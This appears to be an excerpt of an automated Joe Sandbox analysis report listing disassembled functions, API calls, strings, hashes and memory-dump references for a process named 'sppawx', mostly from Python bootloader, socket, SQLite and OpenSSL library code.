String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 8300a19c8206d2102841afb71172eaa2682942542eff747ed74e125f239e34bf
Instruction ID: b0e3666f0701b6b8ee9c2ca97a87f222c2f8db18dccc6f9d51e3304b4f6776b1
Opcode Fuzzy Hash: 8300a19c8206d2102841afb71172eaa2682942542eff747ed74e125f239e34bf
Instruction Fuzzy Hash: 77415E22B0A64296FA20EF3194415F9F390EF44798FC445BEED4D07B99DE3CE5468724

Function 00007FF79A311210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1.3.1, xrefs: 00007FF79A311249
malloc, xrefs: 00007FF79A3112C1, 00007FF79A3112F6
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF79A311276
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF79A31141E
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF79A3112EF
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF79A3112BA

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 0fca6e7335867edc6b8860f5dfbc0b69d345714f0ea111fe4b1d6fcc205b14f0
Instruction ID: 9cdb12622e3148e02a00d8b745e59fab0dcd56885ffe48e76a50b76ddae2c995
Opcode Fuzzy Hash: 0fca6e7335867edc6b8860f5dfbc0b69d345714f0ea111fe4b1d6fcc205b14f0
Instruction Fuzzy Hash: DF519F22A0A64285FA70FB32A4503BAF291EF85B94FC4457DED4D477D9EE3CE5058720

Function 00007FFEDD27514C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAGetLastError.WS2_32 ref: 00007FFEDD2751F3
WSAGetLastError.WS2_32 ref: 00007FFEDD2751FB
WSAGetLastError.WS2_32 ref: 00007FFEDD275260
WSAGetLastError.WS2_32 ref: 00007FFEDD275268

Part of subcall function 00007FFEDD274550: select.WS2_32 ref: 00007FFEDD274618

WSAGetLastError.WS2_32 ref: 00007FFEDD275288
WSAGetLastError.WS2_32 ref: 00007FFEDD27529D

Strings

timed out, xrefs: 00007FFEDD2752CF

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: ErrorLast$select
String ID: timed out
API String ID: 1043644060-3163636755
Opcode ID: 6124cbb36627d7d402abdbcc8bc250e63c8ca632a2510f4f5e29746a45a24143
Instruction ID: 5d91ca7ac4ec2e307d4ea3d65b6ff1a77d0d9620c08048fb04ba8dfce361d1d4
Opcode Fuzzy Hash: 6124cbb36627d7d402abdbcc8bc250e63c8ca632a2510f4f5e29746a45a24143
Instruction Fuzzy Hash: ED416D31E09742A6FA756B65A84427DA290AFD5BB5F1C4133DD4E46EB4FF3CA8878200

Function 00007FF79A3136B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF79A313804), ref: 00007FF79A3136E1
GetLastError.KERNEL32(?,00007FF79A313804), ref: 00007FF79A3136EB

Part of subcall function 00007FF79A312C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312C9E
Part of subcall function 00007FF79A312C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312D63
Part of subcall function 00007FF79A312C50: MessageBoxW.USER32 ref: 00007FF79A312D99

Strings

GetModuleFileNameW, xrefs: 00007FF79A3136FA
Failed to resolve full path to executable %ls., xrefs: 00007FF79A313739
Failed to obtain executable path., xrefs: 00007FF79A3136F3
\\?\, xrefs: 00007FF79A31375A
Failed to convert executable path to UTF-8., xrefs: 00007FF79A313790

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: 5a229fdd7c3bb9797aaf822313a529a280b8426934195dd4ae7486ff112769f0
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: 19214F61F1E64291FA71FB31E8553B6B290BF88394FC041BEE65D825D5EE2CE509C720

Function 00007FF79A32BACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A32BEF9

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
Instruction ID: 11b114a80602d514dd58e9dceae7d7d1c247fc3b977190388b0f37f93051e6a6
Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
Instruction Fuzzy Hash: 99C1C32290E78692F770AF3594482BDB764EB81B80FD541BDEE4E077A5CE7CE8458720

Function 00007FFEDD276C68 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 82COMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFEDD276CC2
setsockopt.WS2_32 ref: 00007FFEDD276DB3

Strings

iii:setsockopt, xrefs: 00007FFEDD276C91
socket option is larger than %i bytes, xrefs: 00007FFEDD276D7D
iiO!I:setsockopt, xrefs: 00007FFEDD276CEC
iiy*:setsockopt, xrefs: 00007FFEDD276D4D

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: setsockopt
String ID: iiO!I:setsockopt$iii:setsockopt$iiy*:setsockopt$socket option is larger than %i bytes
API String ID: 3981526788-1608436615
Opcode ID: 6a71c4d31bb7b70cba93c4add455e8d7ddfed6c2ff97cc618a081cd4a75b7a58
Instruction ID: bb3d699b2e2dd794c60731d2e81652bd9d2c6d37fdb914be9125c49ed805c737
Opcode Fuzzy Hash: 6a71c4d31bb7b70cba93c4add455e8d7ddfed6c2ff97cc618a081cd4a75b7a58
Instruction Fuzzy Hash: 15410B31A08B86A6EB708B11E4446AE7361FBC9BA4F580132DA5D43F74EF3DD548CB44

Function 00007FF79A316350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

LoadLibrary, xrefs: 00007FF79A31649E
ucrtbase.dll, xrefs: 00007FF79A3163CD
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF79A3163B7
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF79A316446
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF79A3163F7
Failed to load Python DLL '%ls'., xrefs: 00007FF79A316497

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
Instruction ID: 46f8135214d4901e76f154056be3ef0838f3a313fe8241fec1de31a919c01be0
Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
Instruction Fuzzy Hash: 61415C61B0EA8691FA31EB71E4552EAB351FB44384FC0417EEA5D43696EF3CE609C360

Function 00007FFEDD29EF40 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 412fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FFEDD29F17A

Part of subcall function 00007FFEDD29E980: 00007FFEF5CE19C0.VCRUNTIME140 ref: 00007FFEDD29E9EB
Part of subcall function 00007FFEDD29E980: 00007FFEF5CE19C0.VCRUNTIME140 ref: 00007FFEDD29EA73

Strings

exclusive, xrefs: 00007FFEDD29F10A
winOpen, xrefs: 00007FFEDD29F3ED
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFEDD29F256
psow, xrefs: 00007FFEDD29F4F1

Memory Dump Source

Source File: 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFEDD290000, based on PE: true

Associated: 00000002.00000002.1752235786.00007FFEDD290000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD3E9000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD3EB000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD400000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752538065.00007FFEDD402000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752579795.00007FFEDD404000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd290000_sppawx.jbxd

Similarity

API ID: 00007$CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 4190464644-3829269058
Opcode ID: 3bf394784fb49c126f92dae6b034876b463d8c9389f1d231e195629b2493f58d
Instruction ID: 4338921ea1f4e235a871f727d5b353c7f9f2707bb2631de8ff542885270f7048
Opcode Fuzzy Hash: 3bf394784fb49c126f92dae6b034876b463d8c9389f1d231e195629b2493f58d
Instruction Fuzzy Hash: F4024E21A4D64286FAB58F21E89427DA3A4FF94B94F0C0636DA5D46EB4EF7CE4498700

Function 00007FFEDD274434 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 00007FFEDD274465
WSAGetLastError.WS2_32 ref: 00007FFEDD27447E
WSAGetLastError.WS2_32 ref: 00007FFEDD27448A
WSASetLastError.WS2_32 ref: 00007FFEDD2744D4

Part of subcall function 00007FFEDD27514C: WSAGetLastError.WS2_32 ref: 00007FFEDD2751F3
Part of subcall function 00007FFEDD27514C: WSAGetLastError.WS2_32 ref: 00007FFEDD2751FB

Strings

3', xrefs: 00007FFEDD2744B8

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: ErrorLast$connect
String ID: 3'
API String ID: 375857812-280543908
Opcode ID: 8fbe942215a69ff07f7e94bc13478a0332a10ad1db4b1f47bfbad09f857d53ed
Instruction ID: 6e1ff27f8dfb73a2b9b6bc99584e322ead3e489db805f2af91e3a1731bae185d
Opcode Fuzzy Hash: 8fbe942215a69ff07f7e94bc13478a0332a10ad1db4b1f47bfbad09f857d53ed
Instruction Fuzzy Hash: D3316231B08B4296E7705F25A85457D6694BFD47B8F080137EE9E82FB5EF3CE4428600

Function 00007FFEDD23A404 Relevance: 7.7, APIs: 5, Instructions: 200encryptionCOMMON

Download Yara Rule

APIs

00007FFEDDCAD2CC.PYTHON312 ref: 00007FFEDD23A425

Part of subcall function 00007FFEDD23C500: CertOpenStore.CRYPT32 ref: 00007FFEDD23C52C

GetLastError.KERNEL32 ref: 00007FFEDD23A45E
CertEnumCertificatesInStore.CRYPT32 ref: 00007FFEDD23A53F
CertFreeCertificateContext.CRYPT32 ref: 00007FFEDD23A5E0
CertCloseStore.CRYPT32 ref: 00007FFEDD23A654

Memory Dump Source

Source File: 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFEDD230000, based on PE: true

Associated: 00000002.00000002.1751677591.00007FFEDD230000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD250000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD259000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD25D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751883985.00007FFEDD260000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751922759.00007FFEDD262000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd230000_sppawx.jbxd

Similarity

API ID: Cert$Store$00007CertificateCertificatesCloseContextEnumErrorFreeLastOpen
String ID:
API String ID: 2716309604-0
Opcode ID: ede5967ba143f5375be10210da6bbb9a510fe03299ea453ea1123846b6fffd8f
Instruction ID: 3abd26431c138c738098443ac9bfd8697c21ea1f9c9266aa323bfc6a869338c7
Opcode Fuzzy Hash: ede5967ba143f5375be10210da6bbb9a510fe03299ea453ea1123846b6fffd8f
Instruction Fuzzy Hash: 24811A35E0970286EA35AF259A1813D63A5FFC4B95F4C453ACA0E06FB1FE3EE4569700

Function 00007FFEDD23C500 Relevance: 7.6, APIs: 5, Instructions: 60encryptionCOMMON

Download Yara Rule

APIs

CertOpenStore.CRYPT32 ref: 00007FFEDD23C52C
CertOpenStore.CRYPT32 ref: 00007FFEDD23C55F
CertAddStoreToCollection.CRYPT32 ref: 00007FFEDD23C57A
CertCloseStore.CRYPT32 ref: 00007FFEDD23C58C
CertCloseStore.CRYPT32 ref: 00007FFEDD23C5A7

Memory Dump Source

Source File: 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFEDD230000, based on PE: true

Associated: 00000002.00000002.1751677591.00007FFEDD230000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD250000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD259000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD25D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751883985.00007FFEDD260000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751922759.00007FFEDD262000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd230000_sppawx.jbxd

Similarity

API ID: CertStore$CloseOpen$Collection
String ID:
API String ID: 1995843185-0
Opcode ID: 14e9d6f20bcf662a5dc976c779a8626d1d0426be9f2da94a963353ed828a26b9
Instruction ID: 50e72d3691635559913610a52013a4fbf960ffafef0f1bc334a0ba0b70bebd66
Opcode Fuzzy Hash: 14e9d6f20bcf662a5dc976c779a8626d1d0426be9f2da94a963353ed828a26b9
Instruction Fuzzy Hash: C8214F36B1875186E7748B16A94472DA7A1FBC4F80F48403ACE4D53F64EF3CE4169600

Function 00007FFEDD2A90D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 176COMMON

Download Yara Rule

Strings

database corruption, xrefs: 00007FFEDD2A910B, 00007FFEDD2A9267
%s at line %d of [%.10s], xrefs: 00007FFEDD2A9112, 00007FFEDD2A926E
831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0, xrefs: 00007FFEDD2A90F2, 00007FFEDD2A924E

Memory Dump Source

Source File: 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFEDD290000, based on PE: true

Associated: 00000002.00000002.1752235786.00007FFEDD290000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD3E9000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD3EB000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD400000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752538065.00007FFEDD402000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752579795.00007FFEDD404000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd290000_sppawx.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
API String ID: 0-3764764234
Opcode ID: a575294e85077e3cd45ec191bb9800bea06e703a172f2da4913369db34031028
Instruction ID: b60e5ea8165b0f55265a47320ff4805caa0a8ed499ddb36b53dd618bbb30bd7c
Opcode Fuzzy Hash: a575294e85077e3cd45ec191bb9800bea06e703a172f2da4913369db34031028
Instruction Fuzzy Hash: E3711F22A0864685FA759B16D4443BEB3A1EBD4B84F9C6537CA5D47EB5FF3CE8418300

Function 00007FFEDD29C960 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 00007FFEDD29CA20
00007FFEF5CE19C0.VCRUNTIME140 ref: 00007FFEDD29CAE4

Strings

winRead, xrefs: 00007FFEDD29CA78
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFEDD29CAB9

Memory Dump Source

Source File: 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFEDD290000, based on PE: true

Associated: 00000002.00000002.1752235786.00007FFEDD290000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD3E9000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD3EB000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD400000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752538065.00007FFEDD402000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752579795.00007FFEDD404000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd290000_sppawx.jbxd

Similarity

API ID: 00007FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 3505667475-1843600136
Opcode ID: 741b0e31e271a6a920d8f7a77574a081f4792607e0774ba0d9e6d6aca4af2089
Instruction ID: 6eee181cbf011acdba92472f78ae3d6cb709545c3fb9b57d8eb1dcdf7a02f049
Opcode Fuzzy Hash: 741b0e31e271a6a920d8f7a77574a081f4792607e0774ba0d9e6d6aca4af2089
Instruction Fuzzy Hash: C941E132A08A4286E230DF25E8445BDB365FB94780F5D4537EA5E43EB4EF3CE9469740

Function 00007FF79A325698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3256C5
CreateFileW.KERNEL32 ref: 00007FF79A325704
CloseHandle.KERNEL32 ref: 00007FF79A325739

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction ID: 99208a7bd62d03fe223c48bba9b6c9d1b163a6a2775e67259bef1c964edd8153
Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction Fuzzy Hash: 2541A122D1978283F360AB319654379B260FB947A4F50937DEA9C03ED6DF7CA5E08760

Function 00007FFEDCBF14EC Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 206COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFEDCC37EF5

Strings

..\s\ssl\record\rec_layer_s3.c, xrefs: 00007FFEDCC37E9D, 00007FFEDCC37FE4, 00007FFEDCC38018
ssl3_read_n, xrefs: 00007FFEDCC37E91, 00007FFEDCC37FD8, 00007FFEDCC3800C

Memory Dump Source

Source File: 00000002.00000002.1751324837.00007FFEDCBF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCBF0000, based on PE: true

Associated: 00000002.00000002.1751293524.00007FFEDCBF0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC73000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC9D000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCCA8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCCB3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751596856.00007FFEDCCB7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedcbf0000_sppawx.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_read_n
API String ID: 1452528299-4226281315
Opcode ID: fc9a4683d5afafe68efa1a8744627e211dffef789f65c49c1f38ce80a962cb2e
Instruction ID: d337b8372069a9c943e34c72748f68f90760c0ace0bb12c17887ccaec3904741
Opcode Fuzzy Hash: fc9a4683d5afafe68efa1a8744627e211dffef789f65c49c1f38ce80a962cb2e
Instruction Fuzzy Hash: 8F916B21B8865286FB50DF29E6507BD26A0EB44BD8F584236DB0C0AEE4DF38D847C752

Function 00007FF79A31CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF79A31CE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF79A31CE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF79A31CCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF79A31CD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF79A31CD91

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

